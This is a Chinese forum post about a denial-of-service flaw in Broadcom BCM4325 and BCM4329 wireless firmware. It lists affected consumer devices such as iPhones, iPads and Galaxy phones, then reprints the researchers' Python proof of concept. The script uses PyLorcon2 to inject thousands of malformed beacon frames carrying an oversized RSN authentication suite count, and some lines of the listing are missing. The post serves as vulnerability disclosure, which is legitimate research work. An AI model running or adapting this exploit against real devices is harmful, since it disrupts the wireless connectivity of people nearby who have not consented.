|
此次出现漏洞的是Broadcom的无线网卡固件,型号为BCM4325和BCM4329,攻击者可以通过发送特定的无线网络数据包导致拒绝服务攻击。 主要影响的设备有:
BCM4325
Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HTC Droid Incredible Samsung Spica Acer Liquid Motorola Devour - Ford Edge (yes, it’s a car)
BCM4329
Apple iPhone 4 Apple iPhone 4 Verizon Apple iPod 3G Apple iPad Wi-Fi Apple iPad 3G Apple iPad 2 Apple Tv 2G Motorola Xoom Motorola Droid X2 Motorola Atrix Samsung Galaxy Tab Samsung Galaxy S 4G Samsung Nexus S Samsung Stratosphere Samsung Fascinate HTC Nexus One HTC Evo 4G HTC ThunderBolt HTC Droid Incredible 2 LG Revolution Sony Ericsson Xperia Play Pantech Breakout Nokia Lumina 800 Kyocera Echo - Asus Transformer Prime
- Malata ZPad
可以看到苹果三星都在其中,估计影响的范围是比较大的。漏洞由Andres Blanco发现,Core Impact team的 Andres Blanco和 Matias Eissler写出了漏洞的POC,POC如下: 本POC在python开源库 library Lorcon和 PyLorcon2下实现 ​
1 | ------------------------- poc.py ------------------------- |
9 | def beaconFrameGenerator(): |
12 | sequence = sequence % 4096 |
15 | frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon |
16 | frame += '\x00' # Flags: 0 |
17 | frame += '\x00\x00' # Duration: 0 |
18 | frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff |
19 | frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad |
20 | frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad |
21 | frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: |
24 | frame += struct.pack('Q', time.time()) # Timestamp |
25 | frame += '\x64\x00' # Beacon Interval: 0.102400 seconds |
26 | frame += '\x11\x04' # Capability Information: ESS, Privacy, |
28 | # Information Elements |
30 | frame += '\x00\x05buggy' |
31 | # Supported Rates: 1,2,5.5,11,18,24,36,54 |
32 | frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' |
34 | frame += '\x03\x01\x06' |
36 | frame += '\x30' # ID: 48 |
37 | frame += '\x14' # Size: 20 |
38 | frame += '\x01\x00' # Version: 1 |
39 | frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP |
40 | frame += '\x01\x00' # Pairwise cipher suite count: 1 |
41 | frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP |
42 | frame += '\xff\xff' # Authentication suites count: 65535 |
43 | frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK |
49 | if __name__ == "__main__": |
50 | if len(sys.argv) != 2: |
52 | print "\t%s <wireless interface>" % sys.argv[0] |
56 | context = PyLorcon2.Context(iface) |
59 | generator = beaconFrameGenerator() |
61 | for i in range(10000): |
62 | frame = generator.next() |
64 | context.send_bytes(frame) |
| 
窥视卡
雷达卡
发表于 2012-11-9 03:27:09
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2012-11-21 22:34:49